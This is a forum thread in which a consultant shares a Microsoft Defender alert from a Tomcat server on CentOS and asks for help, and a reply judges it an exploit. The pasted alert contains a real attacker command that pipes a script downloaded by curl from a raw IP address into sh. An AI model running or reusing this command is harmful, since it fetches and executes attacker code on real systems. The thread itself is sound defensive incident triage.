Suspicious process executed by a network service on CentOS 7.9
Hello community members,
I am an Azure consultant and I have a customer who is getting "Suspicious process executed by a network service on CentOS 7.9" Microsoft defender for cloud high severity alert. Environment: Apache tomcat webserver running on CentOS 7.9 We have downloaded the defender report as follows: [7402] java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.security.egd=file:///dev/urandom -Djava.awt.headless=true -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512M -Xmx1024M -server -XX:+UseParallelGC -Dignore.endorsed.dirs= -classpath /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start Command line /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.372.b07-1.el7_9.x86_64/jre//bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.security.egd=file:///dev/urandom -Djava.awt.headless=true -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512M -Xmx1024M -server -XX:+UseParallelGC -Dignore.endorsed.dirs= -classpath /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start Process id 7402 Image file path /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.372.b07-1.el7_9.x86_64/jre/bin/java Image file SHA1 2bffb1d3d46365ca0e78f96577123814b54dbe88 Image file last modification time May 15, 2023 8:25:05 PM Image file java Effective user tomcat 1/6/2024 9:11:14 PM [7402] bash /bin/sh -c "cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt |sh" Command line /bin/sh -c "cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt |sh" Process id 7402 Image file path /usr/bin/bash Image file SHA1 9ad737cbd8bbdddc96726156dbd3bc03936bf02f Image file last modification time Nov 24, 2021 10:03:27 PM Mitre techniques T1505: Server Software Component, T1059: Command and Scripting Interpreter, T1059.004: Unix Shell, T1505.003: Web Shell, T1190: Exploit Public-Facing Application Image file bash Effective user tomcat Referenced in commandline http://222.108.161.27:7070/docs/da.txt Referenced in commandline 222.108.161.27 I need help to identify what is happening here? Is the process happening within the tomcat or outside tomcat (over public ip)? |
Have you looked at the file being curled, and the pastebin data it references? Yes, I'd say something nefarious is going on here.
Someone is at least attempting to start a shell process, and it looks like they're exploiting a vulnerability in tomcat (edit: or the Java application it's running) in order to do so. |
All times are GMT -5. The time now is 10:17 PM. |